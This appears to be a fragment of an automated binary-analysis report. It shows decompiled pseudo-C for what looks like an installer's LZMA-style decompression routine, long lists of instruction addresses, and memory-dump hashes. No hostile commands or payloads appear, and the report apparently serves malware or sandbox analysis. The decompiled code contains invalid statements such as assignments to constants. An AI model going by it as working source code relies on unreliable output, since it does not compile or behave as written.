                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            												goto L120;
                                            											case 0x16:
                                            												__eax =  *(__ebp - 0x30);
                                            												__eflags = __eax - 4;
                                            												if(__eax >= 4) {
                                            													_push(3);
                                            													_pop(__eax);
                                            												}
                                            												__ecx =  *(__ebp - 4);
                                            												 *(__ebp - 0x40) = 6;
                                            												__eax = __eax << 7;
                                            												 *(__ebp - 0x7c) = 0x19;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L145;
                                            											case 0x17:
                                            												L145:
                                            												__eax =  *(__ebp - 0x40);
                                            												 *(__ebp - 0x50) = 1;
                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            												goto L149;
                                            											case 0x18:
                                            												L146:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x18;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t484 = __ebp - 0x70;
                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t484;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L148:
                                            												_t487 = __ebp - 0x48;
                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                            												__eflags =  *_t487;
                                            												L149:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__ecx =  *(__ebp - 0x40);
                                            													__ebx =  *(__ebp - 0x50);
                                            													0 = 1;
                                            													__eax = 1 << __cl;
                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            													__eax =  *(__ebp - 0x7c);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													while(1) {
                                            														 *(_t621 - 0x88) = _t542;
                                            														goto L1;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x50);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            												__eax =  *(__ebp - 0x58);
                                            												__esi = __edx + __eax;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__ax =  *__esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													__cx = __ax >> 5;
                                            													__eax = __eax - __ecx;
                                            													__edx = __edx + 1;
                                            													__eflags = __edx;
                                            													 *__esi = __ax;
                                            													 *(__ebp - 0x50) = __edx;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L148;
                                            												} else {
                                            													goto L146;
                                            												}
                                            											case 0x19:
                                            												__eflags = __ebx - 4;
                                            												if(__ebx < 4) {
                                            													 *(__ebp - 0x2c) = __ebx;
                                            													L119:
                                            													_t393 = __ebp - 0x2c;
                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                            													__eflags =  *_t393;
                                            													L120:
                                            													__eax =  *(__ebp - 0x2c);
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            														goto L170;
                                            													}
                                            													__eflags = __eax -  *(__ebp - 0x60);
                                            													if(__eax >  *(__ebp - 0x60)) {
                                            														goto L171;
                                            													}
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            													__eax =  *(__ebp - 0x30);
                                            													_t400 = __ebp - 0x60;
                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            													__eflags =  *_t400;
                                            													goto L123;
                                            												}
                                            												__ecx = __ebx;
                                            												__eax = __ebx;
                                            												__ecx = __ebx >> 1;
                                            												__eax = __ebx & 0x00000001;
                                            												__ecx = (__ebx >> 1) - 1;
                                            												__al = __al | 0x00000002;
                                            												__eax = (__ebx & 0x00000001) << __cl;
                                            												__eflags = __ebx - 0xe;
                                            												 *(__ebp - 0x2c) = __eax;
                                            												if(__ebx >= 0xe) {
                                            													__ebx = 0;
                                            													 *(__ebp - 0x48) = __ecx;
                                            													L102:
                                            													__eflags =  *(__ebp - 0x48);
                                            													if( *(__ebp - 0x48) <= 0) {
                                            														__eax = __eax + __ebx;
                                            														 *(__ebp - 0x40) = 4;
                                            														 *(__ebp - 0x2c) = __eax;
                                            														__eax =  *(__ebp - 4);
                                            														__eax =  *(__ebp - 4) + 0x644;
                                            														__eflags = __eax;
                                            														L108:
                                            														__ebx = 0;
                                            														 *(__ebp - 0x58) = __eax;
                                            														 *(__ebp - 0x50) = 1;
                                            														 *(__ebp - 0x44) = 0;
                                            														 *(__ebp - 0x48) = 0;
                                            														L112:
                                            														__eax =  *(__ebp - 0x40);
                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            															_t391 = __ebp - 0x2c;
                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            															__eflags =  *_t391;
                                            															goto L119;
                                            														}
                                            														__eax =  *(__ebp - 0x50);
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            														__eax =  *(__ebp - 0x58);
                                            														__esi = __edi + __eax;
                                            														 *(__ebp - 0x54) = __esi;
                                            														__ax =  *__esi;
                                            														__ecx = __ax & 0x0000ffff;
                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                            														if( *(__ebp - 0xc) >= __edx) {
                                            															__ecx = 0;
                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            															__ecx = 1;
                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            															__ebx = 1;
                                            															__ecx =  *(__ebp - 0x48);
                                            															__ebx = 1 << __cl;
                                            															__ecx = 1 << __cl;
                                            															__ebx =  *(__ebp - 0x44);
                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                            															__cx = __ax;
                                            															__cx = __ax >> 5;
                                            															__eax = __eax - __ecx;
                                            															__edi = __edi + 1;
                                            															__eflags = __edi;
                                            															 *(__ebp - 0x44) = __ebx;
                                            															 *__esi = __ax;
                                            															 *(__ebp - 0x50) = __edi;
                                            														} else {
                                            															 *(__ebp - 0x10) = __edx;
                                            															0x800 = 0x800 - __ecx;
                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            															 *__esi = __dx;
                                            														}
                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                            															L111:
                                            															_t368 = __ebp - 0x48;
                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                            															__eflags =  *_t368;
                                            															goto L112;
                                            														} else {
                                            															goto L109;
                                            														}
                                            													}
                                            													__ecx =  *(__ebp - 0xc);
                                            													__ebx = __ebx + __ebx;
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            														__ecx =  *(__ebp - 0x10);
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            														__ebx = __ebx | 0x00000001;
                                            														__eflags = __ebx;
                                            														 *(__ebp - 0x44) = __ebx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L101:
                                            														_t338 = __ebp - 0x48;
                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                            														__eflags =  *_t338;
                                            														goto L102;
                                            													} else {
                                            														goto L99;
                                            													}
                                            												}
                                            												__edx =  *(__ebp - 4);
                                            												__eax = __eax - __ebx;
                                            												 *(__ebp - 0x40) = __ecx;
                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            												goto L108;
                                            											case 0x1a:
                                            												L56:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1a;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x68);
                                            												__al =  *(__ebp - 0x5c);
                                            												__edx =  *(__ebp - 8);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *( *(__ebp - 0x68)) = __al;
                                            												__ecx =  *(__ebp - 0x14);
                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                            												__eax = __ecx + 1;
                                            												__edx = 0;
                                            												_t192 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t192;
                                            												goto L79;
                                            											case 0x1b:
                                            												L75:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1b;
                                            													goto L170;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t274 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t274;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												_t283 = __ebp - 0x64;
                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                            												__eflags =  *_t283;
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												L79:
                                            												 *(__ebp - 0x14) = __edx;
                                            												goto L80;
                                            											case 0x1c:
                                            												while(1) {
                                            													L123:
                                            													__eflags =  *(__ebp - 0x64);
                                            													if( *(__ebp - 0x64) == 0) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__edx =  *(__ebp - 8);
                                            													__cl =  *(__eax + __edx);
                                            													__eax =  *(__ebp - 0x14);
                                            													 *(__ebp - 0x5c) = __cl;
                                            													 *(__eax + __edx) = __cl;
                                            													__eax = __eax + 1;
                                            													__edx = 0;
                                            													_t414 = __eax %  *(__ebp - 0x74);
                                            													__eax = __eax /  *(__ebp - 0x74);
                                            													__edx = _t414;
                                            													__eax =  *(__ebp - 0x68);
                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            													__eflags =  *(__ebp - 0x30);
                                            													 *( *(__ebp - 0x68)) = __cl;
                                            													 *(__ebp - 0x14) = _t414;
                                            													if( *(__ebp - 0x30) > 0) {
                                            														continue;
                                            													} else {
                                            														L80:
                                            														 *(__ebp - 0x88) = 2;
                                            														goto L1;
                                            													}
                                            												}
                                            												 *(__ebp - 0x88) = 0x1c;
                                            												goto L170;
                                            										}
                                            									}
                                            									L171:
                                            									_t544 = _t543 | 0xffffffff;
                                            									goto L172;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L1;
                                            				}
                                            			}














                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x00406843
                                            0x00406840
                                            0x00000000
                                            0x00406477

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                            • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                            • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                            • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00406591() {
                                            				unsigned short _t531;
                                            				signed int _t532;
                                            				void _t533;
                                            				signed int _t534;
                                            				signed int _t535;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t589;
                                            				signed int* _t606;
                                            				void* _t613;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t613 - 0x40) != 0) {
                                            						 *(_t613 - 0x84) = 0xb;
                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                            						goto L132;
                                            					} else {
                                            						__eax =  *(__ebp - 0x28);
                                            						L88:
                                            						 *(__ebp - 0x2c) = __eax;
                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            						L89:
                                            						__eax =  *(__ebp - 4);
                                            						 *(__ebp - 0x80) = 0x15;
                                            						__eax =  *(__ebp - 4) + 0xa68;
                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            						L69:
                                            						 *(__ebp - 0x84) = 0x12;
                                            						while(1) {
                                            							L132:
                                            							 *(_t613 - 0x54) = _t606;
                                            							while(1) {
                                            								L133:
                                            								_t531 =  *_t606;
                                            								_t589 = _t531 & 0x0000ffff;
                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            								if( *(_t613 - 0xc) >= _t565) {
                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            									 *(_t613 - 0x40) = 1;
                                            									_t532 = _t531 - (_t531 >> 5);
                                            									 *_t606 = _t532;
                                            								} else {
                                            									 *(_t613 - 0x10) = _t565;
                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            								}
                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                            									goto L139;
                                            								}
                                            								L137:
                                            								if( *(_t613 - 0x6c) == 0) {
                                            									 *(_t613 - 0x88) = 5;
                                            									L170:
                                            									_t568 = 0x22;
                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                            									_t535 = 0;
                                            									L172:
                                            									return _t535;
                                            								}
                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            								L139:
                                            								_t533 =  *(_t613 - 0x84);
                                            								while(1) {
                                            									 *(_t613 - 0x88) = _t533;
                                            									while(1) {
                                            										L1:
                                            										_t534 =  *(_t613 - 0x88);
                                            										if(_t534 > 0x1c) {
                                            											break;
                                            										}
                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                            											case 0:
                                            												if( *(_t613 - 0x6c) == 0) {
                                            													goto L170;
                                            												}
                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            												_t534 =  *( *(_t613 - 0x70));
                                            												if(_t534 > 0xe1) {
                                            													goto L171;
                                            												}
                                            												_t538 = _t534 & 0x000000ff;
                                            												_push(0x2d);
                                            												asm("cdq");
                                            												_pop(_t570);
                                            												_push(9);
                                            												_pop(_t571);
                                            												_t609 = _t538 / _t570;
                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                            												asm("cdq");
                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                            												 *(_t613 - 0x3c) = _t604;
                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                            													L10:
                                            													if(_t612 == 0) {
                                            														L12:
                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            														goto L15;
                                            													} else {
                                            														goto L11;
                                            													}
                                            													do {
                                            														L11:
                                            														_t612 = _t612 - 1;
                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                            													} while (_t612 != 0);
                                            													goto L12;
                                            												}
                                            												if( *(_t613 - 4) != 0) {
                                            													GlobalFree( *(_t613 - 4));
                                            												}
                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            												 *(_t613 - 4) = _t534;
                                            												if(_t534 == 0) {
                                            													goto L171;
                                            												} else {
                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                            													goto L10;
                                            												}
                                            											case 1:
                                            												L13:
                                            												__eflags =  *(_t613 - 0x6c);
                                            												if( *(_t613 - 0x6c) == 0) {
                                            													 *(_t613 - 0x88) = 1;
                                            													goto L170;
                                            												}
                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            												_t45 = _t613 - 0x48;
                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                            												__eflags =  *_t45;
                                            												L15:
                                            												if( *(_t613 - 0x48) < 4) {
                                            													goto L13;
                                            												}
                                            												_t546 =  *(_t613 - 0x40);
                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                            													L20:
                                            													 *(_t613 - 0x48) = 5;
                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                            													goto L23;
                                            												}
                                            												 *(_t613 - 0x74) = _t546;
                                            												if( *(_t613 - 8) != 0) {
                                            													GlobalFree( *(_t613 - 8)); // executed
                                            												}
                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                            												 *(_t613 - 8) = _t534;
                                            												if(_t534 == 0) {
                                            													goto L171;
                                            												} else {
                                            													goto L20;
                                            												}
                                            											case 2:
                                            												L24:
                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                            												 *(_t613 - 0x84) = 6;
                                            												 *(_t613 - 0x4c) = _t553;
                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                            												L132:
                                            												 *(_t613 - 0x54) = _t606;
                                            												goto L133;
                                            											case 3:
                                            												L21:
                                            												__eflags =  *(_t613 - 0x6c);
                                            												if( *(_t613 - 0x6c) == 0) {
